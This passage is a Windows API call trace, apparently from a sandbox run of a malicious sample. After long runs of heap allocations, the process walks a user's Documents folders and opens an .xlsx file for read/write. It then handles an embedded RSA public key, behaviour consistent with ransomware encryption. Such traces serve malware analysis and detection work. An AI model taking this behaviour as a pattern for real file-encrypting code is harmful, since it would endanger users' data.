(HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0235.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0235.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0235.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0235.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0235.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.141] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\") returned="eBkpfXutqqrq6h\\" [0235.141] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\") returned="X0h6NwRPaRX5m\\" [0235.142] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0235.142] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0235.142] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0235.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0235.142] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0235.142] PathFindFileNameW (pszPath="") returned="" [0235.142] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6a05980, ftCreationTime.dwHighDateTime=0x1d5e36a, ftLastAccessTime.dwLowDateTime=0xe02a4a10, ftLastAccessTime.dwHighDateTime=0x1d5db42, ftLastWriteTime.dwLowDateTime=0xe02a4a10, ftLastWriteTime.dwHighDateTime=0x1d5db42, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0235.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.145] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6a05980, ftCreationTime.dwHighDateTime=0x1d5e36a, ftLastAccessTime.dwLowDateTime=0xe02a4a10, ftLastAccessTime.dwHighDateTime=0x1d5db42, ftLastWriteTime.dwLowDateTime=0xe02a4a10, ftLastWriteTime.dwHighDateTime=0x1d5db42, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0235.145] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64c3b700, ftCreationTime.dwHighDateTime=0x1d5e21b, ftLastAccessTime.dwLowDateTime=0x48038040, ftLastAccessTime.dwHighDateTime=0x1d5dd0d, ftLastWriteTime.dwLowDateTime=0x48038040, ftLastWriteTime.dwHighDateTime=0x1d5dd0d, nFileSizeHigh=0x0, nFileSizeLow=0xd325, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9bzSIvv8A.xlsx", cAlternateFileName="9BZSIV~1.XLS")) returned 1 [0235.145] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\9bzSIvv8A.xlsx") returned=".xlsx" [0235.145] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\9bzSIvv8A.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\9bzsivv8a.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.148] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=54053) returned 1 [0235.148] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.151] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xd2ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.151] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.153] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xd325, lpOverlapped=0x0) returned 1 [0235.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.154] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.154] lstrlenA (lpString="-----BEGIN PUBLIC 